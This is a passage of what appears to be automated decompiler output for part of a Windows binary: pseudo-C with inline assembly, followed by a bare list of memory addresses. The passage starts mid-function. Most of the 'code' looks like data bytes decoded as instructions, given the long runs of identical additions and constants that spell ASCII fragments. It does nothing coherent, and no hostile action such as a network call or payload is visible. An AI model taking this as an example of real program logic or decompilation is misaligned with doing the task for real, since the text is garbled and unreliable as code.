												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												_t250 =  *_t125;
												if(_t250 == 0) {
													L187:
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													_t126 = _t125 + 1;
													 *_t126 =  *_t126 + _t149;
													_t125 = _t126 + 1;
													asm("bound esi, [cs:ebx+0x73]");
													L188:
													asm("bound esi, [ebx+0x73]");
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													_push(_t156);
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													asm("pushad");
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													L189:
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + _t125;
													 *_t125 =  *_t125 + 0x40;
													 *_t152 =  *_t152 >> 0x65;
													asm("popad");
													if( *_t152 == 0) {
														L194:
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t149 =  *_t149 ^ _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														L192:
														 *_t149 =  *_t149 + _t149;
														 *_t125 =  *_t125 + _t125;
														L193:
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *(_t125 + 0x2e) =  *(_t125 + 0x2e) ^ _t125;
														_pop(es);
														 *_t125 =  *_t125 + _t125;
														 *((intOrPtr*)(_t125 + 0x8000000)) =  *((intOrPtr*)(_t125 + 0x8000000)) + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t152 =  *_t152 + _t149;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														_t127 = _t125 + 1;
														 *_t127 =  *_t127 + _t149;
														 *_t152 =  *_t152 >> 0x72;
														asm("gs insb");
														asm("outsd");
														asm("arpl [eax], ax");
														_t125 = _t127 + _t133;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t149 =  *_t149 + _t125;
														 *_t125 =  *_t125 + _t125;
														 *_t152 = _t133 +  *_t152;
														 *_t125 =  *_t125 + _t125;
														goto L194;
													}
													 *_t125 =  *_t125 + _t125;
													asm("pushad");
													_t128 = _t125 +  *_t125;
													 *_t128 =  *_t128 + _t128;
													if ( *_t128 < 0) goto L191;
													 *_t128 =  *_t128 + _t128;
													_t125 = _t128;
													 *_t125 =  *_t125 + _t125;
													goto L192;
												}
												if(_t250 < 0) {
													goto L188;
												}
												 *_t125 =  *_t125 + _t125;
												 *_t152 =  *_t152 + _t140;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t149;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t140;
												 *_t125 =  *_t125 + _t125;
												 *((intOrPtr*)(_t125 + _t125)) =  *((intOrPtr*)(_t125 + _t125)) + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												_push(_t125);
												asm("pushad");
												asm("popad");
												if( *_t125 == 0) {
													goto L189;
												}
												 *_t125 =  *_t125 + _t125;
												 *((intOrPtr*)(_t125 + _t125)) =  *((intOrPtr*)(_t125 + _t125)) + _t149;
												 *_t125 =  *_t125 + _t125;
												_t129 = _t125 + 1;
												 *_t129 =  *_t129 + _t129;
												 *_t149 =  *_t149 + _t129;
												 *_t129 =  *_t129 + _t129;
												 *((intOrPtr*)(_t129 + _t129)) =  *((intOrPtr*)(_t129 + _t129)) + _t140;
												 *_t129 =  *_t129 + _t129;
												 *_t129 =  *_t129 + _t129;
												 *_t129 =  *_t129 + _t129;
												 *_t129 =  *_t129 + _t129;
												 *_t129 =  *_t129 + _t129;
												 *_t129 =  *_t129 + _t129;
												 *_t129 =  *_t129 + _t129;
												_t125 = 0;
												if(0 < 0) {
													goto L193;
												}
												asm("popad");
												if(0 == 0) {
													goto L193;
												}
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
												 *((intOrPtr*)(0xfffffffffffffffd)) =  *((intOrPtr*)(0xfffffffffffffffd)) + 0xfffffffffffffffd;
												 *((intOrPtr*)(0xfffffffffffffffd)) =  *((intOrPtr*)(0xfffffffffffffffd)) + _t149;
												 *((intOrPtr*)(0xfffffffffffffffd)) =  *((intOrPtr*)(0xfffffffffffffffd)) + 0xfffffffffffffffd;
												_t125 = 0xfffffffffffffffd;
												 *((intOrPtr*)(0xfffffffffffffffd)) =  *((intOrPtr*)(0xfffffffffffffffd)) + 0xfffffffffffffffd;
												 *[cs:eax] =  *[cs:eax] + 0xfffffffffffffffd;
												goto L187;
											}
											if(_t234 != 0) {
												goto L179;
											}
											asm("fs outsd");
											if (_t234 > 0) goto L178;
											asm("outsb");
										}
										_t136 = _t136 + 1;
										 *_t107 =  *_t107 + _t107;
										asm("loopne 0x2");
										L142:
										 *_t107 =  *_t107 + _t107;
										_t107 =  *0x1000072;
										L143:
										_push(_t150);
										_push(_t133);
										_t136 = _t136 + 1;
										_t228 = _t136;
										_push(_t133);
										if(_t228 == 0) {
											_t155 =  *(_t153 + 0x74) * 0;
											 *_t107 =  *_t107 + _t107;
											 *_t107 =  *_t107 + _t107;
											 *0x561b1e0a =  *0x561b1e0a + _t136;
											asm("aas");
											_push(cs);
											_t142 = _t136 &  *_t150 &  *_t151;
											L168:
											_push(cs);
											asm("lock imul eax, [eax+esi*8], 0x54f00138");
											L169:
											_t107 = 0x17 +  *(_t107 + _t151 * 8) * 0x54f00138;
											asm("lock xor [edx], eax");
											L170:
											 *_t148 =  *_t148 ^ _t107;
											_t143 =  *_t107;
											 *_t107 = _t142;
											 *_t107 =  *_t107 | _t143;
											 *_t107 =  *_t107 | _t143;
											_t144 = _t143 |  *_t133;
											 *_t107 =  *_t107 | _t144;
											 *_t107 =  *_t107 | _t144;
											 *_t107 =  *_t107 | _t144;
											asm("lock inc esi");
											_t136 = (_t144 |  *_t133) +  *_t107;
											L172:
											asm("das");
											asm("outsb");
											asm("outsb");
											_t107 = _t107 - 0x16 +  *_t136;
											 *_t151 =  *_t151 ^ _t148;
											_t260 = _t260 *  *_t107;
											L173:
											 *_t107 =  *_t107 | _t136;
											 *_t107 =  *_t107 | _t136;
											L174:
											 *_t107 =  *_t107 | _t136;
											_t146 = _t136 |  *_t133;
											asm("lock cmp [edx], eax");
											L175:
											asm("lock test dword [eax], 0xa13081e");
											L176:
											_push(ds);
											 *_t133 =  *_t133 | _t148;
											_t148 = _t148 |  *_t133;
											_t136 = _t146 |  *_t146;
											 *_t107 =  *_t107 | _t148;
											_t151 = _t151 + 1;
											 *_t107 =  *_t107 | _t136;
											asm("rcr dword [ebx+0x4e], cl");
											goto L177;
										}
										if(_t228 < 0) {
											goto L169;
										}
										if(_t228 != 0) {
											goto L168;
										}
										 *_t136 =  *_t136 + _t107;
										asm("popad");
										asm("arpl [ebx+0x65], sp");
										if( *_t136 < 0) {
											goto L170;
										}
										 *_t136 =  *_t136 + _t107;
										asm("bound ebp, [ecx+0x6e]");
										 *[fs:ecx] =  *[fs:ecx] + _t107;
										_t230 =  *[fs:ecx];
										asm("arpl [edi+ebp*2+0x73], bp");
										if (_t230 >= 0) goto L171;
										L148:
										asm("outsd");
									}
									L115:
									 *_t136 =  *_t136 + _t107;
									asm("o16 arpl [edi+ebp*2+0x73], bp");
									L116:
									asm("arpl [edi+ebp*2+0x73], bp");
									L117:
									if(_t211 >= 0) {
										L137:
										_t61 =  &(_t150[0x1c]);
										 *_t61 = _t150[0x1c] + _t151;
										_t225 =  *_t61;
									}
									 *_t136 =  *_t136 + _t107;
									asm("o16 insb");
									if( *_t136 != 0) {
										goto L143;
									}
									_push(0x6f660100);
									L120:
									_t42 = _t151 + 0x6f;
									 *_t42 =  *((intOrPtr*)(_t151 + 0x6f)) + _t155;
									if( *_t42 < 0) {
										goto L142;
									}
									L121:
									asm("outsb");
									 *_t136 =  *_t136 + _t107;
									asm("o16 jo 0x75");
									_t153 =  *(_t151 + 0x74) * 0x66010066;
									L122:
									 *_t136 =  *_t136 + _t107;
									asm("o16 jb 0x68");
									L123:
									 *[gs:ecx] =  *[gs:ecx] + _t107;
								}
								L83:
								_t133 = _t133 - 1;
								if (_t133 >= 0) goto L84;
								_t29 = _t148 + 0x65;
								 *_t29 =  *(_t148 + 0x65) + _t148;
								_t200 =  *_t29;
								asm("a16 inc ebx");
								if(_t200 < 0) {
									goto L115;
								}
								asm("popad");
								if(_t200 == 0) {
									goto L116;
								}
								_t133 = _t133 - 1;
								_t201 = _t133;
								if(_t201 >= 0) {
									L108:
									if(_t207 < 0) {
										L133:
										 *_t107 =  *_t107 + _t107;
										_t148 = _t148 + _t136;
										 *_t107 =  *_t107 + _t107;
										 *((intOrPtr*)(_t148 + _t151 * 2)) =  *((intOrPtr*)(_t148 + _t151 * 2)) + _t107;
										 *_t136 =  *_t136 + _t107;
										_pop(_t150);
										_t151 =  *(_t150 + 0x61 + _t153 * 2) * 0xd50000;
										L135:
										 *_t107 =  *_t107 + _t107;
										asm("aad 0x0");
										 *_t107 =  *_t107 + _t107;
										_t223 =  *_t107;
										_t60 = _t107;
										_t107 = _t155;
										_t155 = _t60;
										if (_t223 < 0) goto L136;
										 *_t136 =  *_t136 + _t107;
										goto L137;
									}
									if (_t207 == 0) goto L110;
									L110:
									_t37 =  &(_t150[0x19]);
									 *_t37 = _t133 + _t150[0x19];
									if( *_t37 < 0) {
										goto L135;
									}
									asm("outsb");
									asm("outsd");
									 *_t136 =  *_t136 + _t107;
									L112:
									_t150[0x1a] = _t133 + _t150[0x1a];
									goto L113;
								}
								if(_t201 < 0) {
									L106:
									asm("outsd");
									asm("outsb");
									goto L108;
								}
								 *_t136 =  *_t136 + _t107;
								_push(_t148);
								asm("a16 dec edi");
								L89:
								if(_t201 < 0) {
									goto L120;
								}
								asm("outsb");
								_t133 = _t133 - 1;
								_t202 = _t133;
								if(_t202 >= 0) {
									goto L114;
								}
								if(_t202 < 0) {
									goto L112;
								}
								 *_t136 =  *_t136 + _t107;
								L93:
								_t31 = _t148 + 0x65;
								 *_t31 =  *(_t148 + 0x65) + _t148;
								_t204 =  *_t31;
								asm("a16 push ecx");
								if(_t204 != 0) {
									goto L122;
								}
								if(_t204 < 0) {
									L126:
									 *_t136 =  *_t136 + _t107;
									L127:
									_t49 = _t153 + 0x65;
									 *_t49 =  *(_t153 + 0x65) + _t153;
									_t218 =  *_t49;
									asm("insd");
									if(_t218 >= 0) {
										goto L148;
									}
									if (_t218 == 0) goto L129;
									 *((intOrPtr*)(_t148 + 0x61)) =  *((intOrPtr*)(_t148 + 0x61)) + _t151;
									asm("outsb");
									 *[fs:ecx] =  *[fs:ecx] + _t107;
									if( *[fs:ecx] >= 0) {
										L154:
										if(_t230 >= 0) {
											goto L173;
										}
										asm("popad");
										asm("insd");
										 *[gs:ecx] =  *[gs:ecx] + _t107;
										_t231 =  *[gs:ecx];
										_push(0x736e6f74);
										L156:
										asm("outsd");
										asm("outsb");
										if (_t231 >= 0) goto L157;
										_t66 = _t136 + 0x73 + _t153 * 2;
										 *_t66 =  *((intOrPtr*)(_t136 + 0x73 + _t153 * 2)) + _t153;
										if( *_t66 == 0) {
											goto L175;
										}
										asm("outsb");
										 *_t136 =  *_t136 + _t107;
										if( *_t136 < 0) {
											goto L176;
										}
										asm("arpl [esi], si");
										_t133[0x19] = _t133[0x19] + _t151;
										asm("outsb");
										 *[fs:ecx] =  *[fs:ecx] + _t107;
										_t234 =  *[fs:ecx];
										goto L160;
									}
									asm("popad");
									asm("outsb");
									 *[fs:ecx] =  *[fs:ecx] + _t107;
									_t220 =  *[fs:ecx];
									if(_t220 >= 0) {
										goto L156;
									}
									if(_t220 < 0) {
										if(_t230 == 0) {
											goto L172;
										}
										asm("outsd");
										if(_t230 >= 0) {
											goto L174;
										}
										asm("bound edi, [ecx+0x6e]");
										goto L154;
									}
									asm("popad");
									if (_t220 == 0) goto L134;
									goto L133;
								}
								_push(_t151);
								asm("popad");
								asm("insb");
								L96:
								if(_t204 != 0) {
									 *((intOrPtr*)(_t153 + 0x61)) =  *((intOrPtr*)(_t153 + 0x61)) + _t153;
									asm("insb");
									asm("insb");
									asm("outsd");
									asm("arpl [eax], ax");
									 *(_t153 + 0x65) =  *(_t153 + 0x65) + _t153;
									asm("insd");
									asm("arpl [eax+0x79], si");
									goto L126;
								}
								L97:
								_t153 = _t153 + 1;
								_t205 = _t153;
								if(_t205 < 0) {
									goto L117;
								}
								 *_t136 =  *_t136 + _t107;
								_push(_t148);
								asm("a16 push ebx");
								L99:
								asm("a16 push ebx");
								if(_t205 == 0) {
									goto L123;
								}
								asm("popad");
								asm("insb");
								if(_t205 != 0) {
									goto L127;
								}
								_t153 = _t153 + 1;
								_t206 = _t153;
								L102:
								if(_t206 < 0) {
									goto L121;
								}
								 *_t107 =  *_t107 + _t107;
								asm("retf 0x0");
								L104:
								 *_t107 =  *_t107 + _t107;
								 *((intOrPtr*)(_t107 + 0x72)) =  *((intOrPtr*)(_t107 + 0x72)) + _t148;
								 *_t107 =  *_t107 + _t107;
								_t35 =  &(_t150[0x17]);
								 *_t35 = _t133 + _t150[0x17];
								_t207 =  *_t35;
								asm("fs insb");
								asm("insb");
								goto L106;
							}
							 *[gs:ecx] =  *[gs:ecx] + _t107;
							_push(_t133);
							if ( *[gs:ecx] == 0) goto L71;
							L56:
							_t153 = _t153 + 1;
							_t188 = _t153;
						}
						 *_t136 =  *_t136 + _t107;
						_t150 =  &(_t150[0]);
						_t178 = _t150;
						if(_t178 == 0) {
							L61:
							_t151 = _t151 + 1;
							_t190 = _t151;
						}
						asm("gs insd");
						L41:
						asm("insd");
						if(_t178 < 0) {
							L59:
							if(_t188 < 0) {
								if(_t195 < 0) {
									goto L102;
								}
								asm("insd");
								if(_t195 < 0) {
									goto L93;
								}
								 *_t136 =  *_t136 + _t107;
								_t196 =  *_t136;
								asm("insb");
								if(_t196 >= 0) {
									goto L110;
								}
								if (_t196 < 0) goto L107;
								L80:
								asm("insb");
							}
							asm("outsd");
							 *[gs:ecx] =  *[gs:ecx] + _t107;
							_push(_t133);
							if ( *[gs:ecx] == 0) goto L77;
							goto L61;
						}
						L42:
						_t153 =  *(_t153 + 0x4e) * 0x41656d61;
						 *_t136 =  *_t136 + _t107;
						_t150 =  &(_t150[0]);
						_t179 = _t150;
						if(_t179 == 0) {
							L65:
							asm("insb");
							if (_t191 < 0) goto L66;
							_t150[0x18] = _t150[0x18] + _t148;
							_t151 =  *(_t151 + 0x6f + _t107 * 2) * 0x6e695372;
							_t192 = _t151;
							L67:
							_t153 =  *(_t151 + 0x67) * 0x624f656c;
							_push(0x65);
							asm("arpl [eax+eax+0x1], si");
							L68:
							_push(_t150);
							if(_t192 < 0) {
								goto L97;
							}
							if(_t192 == 0) {
								goto L96;
							}
							_t151 = _t151 + 1;
							_t153 =  *_t153 * 0x74736c01;
							_t193 = _t153;
							asm("insb");
							if(_t193 >= 0) {
								goto L104;
							}
							if(_t193 < 0) {
								goto L99;
							}
							asm("popad");
							if(_t193 == 0) {
								goto L89;
							}
							 *_t136 =  *_t136 + _t107;
							L75:
							_t23 = _t133 + 0x74 + _t151 * 2;
							 *_t23 =  *((intOrPtr*)(_t133 + 0x74 + _t151 * 2)) + _t153;
							_t195 =  *_t23;
						}
						asm("gs insd");
						if(_t179 < 0) {
							goto L65;
						}
						asm("popad");
						if(_t179 == 0) {
							goto L68;
						}
						L45:
						_t136 = _t136 + 1;
						 *_t136 =  *_t136 + _t107;
						L46:
						_t9 =  &(_t150[0x19]);
						 *_t9 = _t150[0x19] + _t107;
						if( *_t9 == 0) {
							goto L67;
						}
						_t155 = _t133[0x1a] * 0x6e756f43;
						L48:
						_t133 =  &(_t133[0]);
						_t183 = _t133;
						asm("outsd");
						if(_t183 != 0) {
							goto L75;
						}
						if (_t183 == 0) goto L50;
						L50:
						_t150[0x1b] = _t150[0x1b] + _t107;
						L51:
						asm("insb");
						asm("outsd");
						asm("bound esp, [ecx+0x6c]");
						_t136 = _t136 + 1;
						asm("insb");
						asm("insb");
						asm("outsd");
						asm("arpl [eax], ax");
						_t150[0x1b] = _t150[0x1b] + _t107;
						L52:
						_t150 =  &(_t150[0]);
						asm("insb");
						asm("outsd");
						asm("bound esp, [ecx+0x6c]");
						goto L53;
					}
					if(_t168 == 0) {
						goto L48;
					}
					asm("insd");
					_t151 = _t151 - 1;
					asm("popad");
					L20:
					asm("insd");
					_t136 = _t136 + 1;
					 *_t136 =  *_t136 + _t107;
					_t150 =  &(_t150[0]);
					_t169 = _t150;
					if(_t169 == 0) {
						goto L42;
					}
					if(_t169 < 0) {
						goto L51;
					}
					if(_t169 <= 0) {
						goto L50;
					}
					_push(_t155);
					if(_t169 >= 0) {
						goto L52;
					}
					L24:
					_t147 = _t136 + 1;
					L25:
					_t136 = _t147 + 1;
					 *_t136 =  *_t136 + _t107;
					_t150 =  &(_t150[0]);
					_t171 = _t150;
					if(_t171 == 0) {
						goto L46;
					}
					L26:
					asm("popad");
					if(_t171 >= 0) {
						goto L56;
					}
					_t153 = _t153 + 1;
					_t172 = _t153;
					if(_t172 < 0) {
						if(_t188 < 0) {
							goto L83;
						}
						asm("outsd");
						goto L59;
					}
					L28:
					asm("outsd");
					if (_t172 < 0) goto L29;
					_t4 =  &(_t150[0x19]);
					 *_t4 = _t150[0x19] + _t107;
					if( *_t4 == 0) {
						goto L50;
					}
					asm("outsd");
					asm("arpl [ecx+0x6c], sp");
					L31:
					asm("insb");
					_push(_t155);
					_t153 =  *(_t153 + 0x65) * 0x65470100;
					L32:
					asm("insd");
					 *[gs:ecx] =  *[gs:ecx] + _t107;
					L33:
					_t150 =  &(_t150[0]);
					_t176 = _t150;
					if(_t176 == 0) {
						goto L54;
					}
					if(_t176 >= 0) {
						if(_t190 >= 0) {
							goto L80;
						}
						 *_t136 =  *_t136 + _t107;
						_t191 =  *_t136;
						_push(_t133);
						goto L65;
					}
					if(_t176 == 0) {
						goto L61;
					}
					asm("insd");
					L37:
					_t155 = _t155 + 1;
					_t151 =  *(_t148 + 0x65) * 0x726f7463;
					_t177 = _t151;
					goto L38;
				}
				asm("insd");
				_t136 = _t136 + 1;
				 *_t136 =  *_t136;
				_t133 =  &(_t133[0]);
				asm("insb");
				asm("outsd");
				if(_t133 >= 0) {
					L16:
					if (_t168 == 0) goto L38;
					goto L17;
				}
				_t107 = 0xffffffffffffffff;
				asm("popad");
				asm("outsb");
				asm("fs insb");
				 *[gs:ecx] =  *[gs:ecx];
				_t133 =  &(_t133[0]);
				asm("outsd");
				if(_t133 < 0) {
					goto L26;
				}
				_t151 = _t151 + 1;
				_t153 =  *(_t153 + 0x41) * 0x72430100;
				asm("popad");
				if(_t153 == 0) {
					goto L25;
				}
				_t151 = _t151 + 1;
				_t153 =  *(_t153 + 0x41) * 0x72430100;
				asm("popad");
				if(_t153 == 0) {
					goto L28;
				}
				_t153 = _t153 - 1;
				_t163 = _t153;
				if(_t163 != 0) {
					goto L33;
				}
				if(_t163 < 0) {
					goto L20;
				}
				 *_t136 =  *_t136;
				_t133 =  &(_t133[0]);
				_t164 = _t133;
				if(_t164 < 0) {
					goto L31;
				}
				asm("popad");
				if(_t164 == 0) {
					goto L32;
				}
				_push(0xffffffffffffffff);
				if(_t164 < 0) {
					goto L37;
				}
				asm("arpl [ebp+0x73], sp");
				if(_t164 >= 0) {
					goto L24;
				}
				 *_t136 =  *_t136;
				_t133 =  &(_t133[0]);
				_t165 = _t133;
				if(_t165 < 0) {
					goto L37;
				}
				asm("popad");
				if(_t165 == 0) {
					goto L38;
				}
				_push(_t155);
				_push(0x64616572);
				 *_t136 =  *_t136;
				_t155 = _t155 + 1;
				asm("gs insb");
				if( *_t136 == 0) {
					goto L41;
				}
				_t151 = _t151 + 1;
				_t153 =  *(_t153 + 0x41) * 0x69460100;
				asm("outsb");
				_t136 = _t136 + 1;
				if(_t136 == 0) {
					goto L45;
				}
				asm("insd");
				_t136 = _t136 + 1;
				 *_t136 =  *_t136;
				_t150 =  &(_t150[0]);
				_t168 = _t150;
				goto L16;
			}

0x1000a000
0x1000a002
0x1000a004
0x1000a007
0x1000a00a
0x1000a00d
0x1000a07e
0x1000a07e
0x1000a0c1
0x1000a0c1
0x1000a0c6
0x1000a109
0x1000a109
0x1000a10a
0x1000a10b
0x1000a10b
0x1000a10c
0x1000a10c
0x1000a173
0x1000a175
0x1000a176
0x1000a178
0x1000a17d
0x1000a17f
0x1000a181
0x1000a182
0x1000a185
0x1000a186
0x1000a187
0x1000a1ee
0x1000a1ee
0x1000a1ef
0x1000a1ef
0x1000a1ef
0x1000a1f6
0x1000a1f7
0x1000a26d
0x1000a2d5
0x1000a2d5
0x1000a33f
0x1000a33f
0x1000a343
0x1000a349
0x1000a34b
0x1000a34c
0x1000a34d
0x1000a34d
0x1000a350
0x1000a352
0x1000a354
0x1000a356
0x1000a358
0x1000a35a
0x1000a35c
0x1000a362
0x1000a364
0x1000a36a
0x1000a36b
0x1000a36c
0x1000a36e
0x1000a36f
0x1000a370
0x1000a372
0x1000a373
0x1000a374
0x1000a376
0x1000a37e
0x1000a380
0x1000a382
0x1000a389
0x1000a38b
0x1000a38d
0x1000a38f
0x1000a391
0x1000a392
0x1000a394
0x1000a396
0x1000a398
0x1000a39a
0x1000a39c
0x1000a39e
0x1000a3a0
0x1000a3a2
0x1000a3a4
0x1000a3a6
0x1000a3a8
0x1000a3aa
0x1000a3ac
0x1000a3ae
0x1000a3b0
0x1000a3b2
0x1000a3b4
0x1000a3b6
0x1000a3b8
0x1000a3ba
0x1000a3bc
0x1000a3be
0x1000a3c0
0x1000a3da
0x1000a3dc
0x1000a3df
0x1000a3e1
0x1000a3e2
0x1000a3e4
0x1000a3ea
0x1000a3ec
0x1000a3ee
0x1000a3f0
0x1000a3f2
0x1000a3f4
0x1000a3f6
0x1000a3fa
0x1000a3fc
0x1000a400
0x1000a402
0x1000a404
0x1000a407
0x1000a409
0x1000a40b
0x1000a40d
0x1000a410
0x1000a412
0x1000a414
0x1000a416
0x1000a418
0x1000a41a
0x1000a41c
0x1000a41f
0x1000a421
0x1000a423
0x1000a425
0x1000a427
0x1000a429
0x1000a42b
0x1000a42d
0x1000a433
0x1000a435
0x1000a438
0x1000a43a
0x1000a43c
0x1000a43e
0x1000a440
0x1000a442
0x1000a444
0x1000a446
0x1000a448
0x1000a44a
0x1000a44c
0x1000a44e
0x1000a450
0x1000a452
0x1000a454
0x1000a456
0x1000a458
0x1000a45b
0x1000a45d
0x1000a463
0x1000a465
0x1000a467
0x1000a469
0x1000a46b
0x1000a46d
0x1000a46f
0x1000a471
0x1000a473
0x1000a475
0x1000a477
0x1000a479
0x1000a47b
0x1000a47d
0x1000a483
0x1000a485
0x1000a487
0x1000a489
0x1000a48b
0x1000a48d
0x1000a48f
0x1000a491
0x1000a493
0x1000a495
0x1000a497
0x1000a499
0x1000a49b
0x1000a49d
0x1000a49f
0x1000a4a1
0x1000a4a3
0x1000a4a5
0x1000a4a7
0x1000a4a9
0x1000a4ab
0x1000a4ad
0x1000a4af
0x1000a4b1
0x1000a4b3
0x1000a4b5
0x1000a4b7
0x1000a4b9
0x1000a4bb
0x1000a4bd
0x1000a4bf
0x1000a4c1
0x1000a4c3
0x1000a4c5
0x1000a4c7
0x1000a4c9
0x1000a4cb
0x1000a4cd
0x1000a4cf
0x1000a4d1
0x1000a4d3
0x1000a4d3
0x1000a4d5
0x1000a53d
0x1000a53d
0x1000a53f
0x1000a541
0x1000a543
0x1000a545
0x1000a547
0x1000a549
0x1000a54a
0x1000a54c
0x1000a54d
0x1000a54e
0x1000a54e
0x1000a551
0x1000a553
0x1000a555
0x1000a556
0x1000a558
0x1000a55a
0x1000a55b
0x1000a55d
0x1000a55f
0x1000a561
0x1000a563
0x1000a563
0x1000a565
0x1000a567
0x1000a569
0x1000a56b
0x1000a56d
0x1000a56f
0x1000a571
0x1000a574
0x1000a577
0x1000a579
0x1000a5dc
0x1000a5dc
0x1000a5de
0x1000a5e0
0x1000a5e2
0x1000a5e4
0x1000a5e6
0x1000a5e8
0x1000a5eb
0x1000a5ef
0x1000a5f1
0x1000a5f3
0x1000a589
0x1000a589
0x1000a58b
0x1000a58c
0x1000a58c
0x1000a58e
0x1000a590
0x1000a592
0x1000a594
0x1000a596
0x1000a598
0x1000a59b
0x1000a5a6
0x1000a5a7
0x1000a5a9
0x1000a5af
0x1000a5b1
0x1000a5b3
0x1000a5b5
0x1000a5b7
0x1000a5b9
0x1000a5bb
0x1000a5bd
0x1000a5bf
0x1000a5c1
0x1000a5c2
0x1000a5c4
0x1000a5c7
0x1000a5c9
0x1000a5ca
0x1000a5cc
0x1000a5ce
0x1000a5d0
0x1000a5d3
0x1000a5d5
0x1000a5d7
0x1000a5d9
0x1000a5db
0x00000000
0x1000a5db
0x1000a57b
0x1000a57d
0x1000a57e
0x1000a580
0x1000a582
0x1000a584
0x1000a586
0x1000a588
0x00000000
0x1000a588
0x1000a4d8
0x00000000
0x00000000
0x1000a4da
0x1000a4dc
0x1000a4df
0x1000a4e1
0x1000a4e3
0x1000a4e5
0x1000a4e7
0x1000a4e9
0x1000a4ec
0x1000a4ee
0x1000a4f0
0x1000a4f2
0x1000a4f4
0x1000a4f6
0x1000a4f8
0x1000a4fb
0x1000a4fc
0x1000a4fd
0x1000a500
0x00000000
0x00000000
0x1000a502
0x1000a504
0x1000a508
0x1000a50a
0x1000a50b
0x1000a50d
0x1000a50f
0x1000a511
0x1000a514
0x1000a516
0x1000a518
0x1000a51a
0x1000a51c
0x1000a51e
0x1000a520
0x1000a523
0x1000a525
0x00000000
0x00000000
0x1000a528
0x1000a529
0x00000000
0x00000000
0x1000a52b
0x1000a52f
0x1000a531
0x1000a534
0x1000a536
0x1000a538
0x1000a53a
0x00000000
0x1000a53a
0x1000a2d7
0x00000000
0x00000000
0x1000a2d9
0x1000a2db
0x1000a2dc
0x1000a2dc
0x1000a26f
0x1000a270
0x1000a272
0x1000a274
0x1000a274
0x1000a276
0x1000a27b
0x1000a27b
0x1000a27c
0x1000a27d
0x1000a27d
0x1000a27e
0x1000a27f
0x1000a2e2
0x1000a2e6
0x1000a2e8
0x1000a2ea
0x1000a2f2
0x1000a2f3
0x1000a2f4
0x1000a2f5
0x1000a2f5
0x1000a2f6
0x1000a2f7
0x1000a2fe
0x1000a300
0x1000a301
0x1000a301
0x1000a303
0x1000a303
0x1000a305
0x1000a307
0x1000a309
0x1000a30b
0x1000a30d
0x1000a30f
0x1000a313
0x1000a315
0x1000a317
0x1000a317
0x1000a31a
0x1000a31b
0x1000a31e
0x1000a320
0x1000a322
0x1000a323
0x1000a323
0x1000a325
0x1000a326
0x1000a326
0x1000a328
0x1000a32a
0x1000a32b
0x1000a32d
0x1000a330
0x1000a330
0x1000a331
0x1000a333
0x1000a335
0x1000a337
0x1000a339
0x1000a33a
0x1000a33c
0x00000000
0x1000a33c
0x1000a281
0x00000000
0x00000000
0x1000a283
0x00000000
0x00000000
0x1000a285
0x1000a287
0x1000a288
0x1000a28b
0x00000000
0x00000000
0x1000a28d
0x1000a28f
0x1000a292
0x1000a292
0x1000a295
0x1000a299
0x1000a29b
0x1000a29b
0x1000a29b
0x1000a1f9
0x1000a1f9
0x1000a1fb
0x1000a1fc
0x1000a1fc
0x1000a1ff
0x1000a1ff
0x1000a266
0x1000a266
0x1000a266
0x1000a266
0x1000a266
0x1000a201
0x1000a203
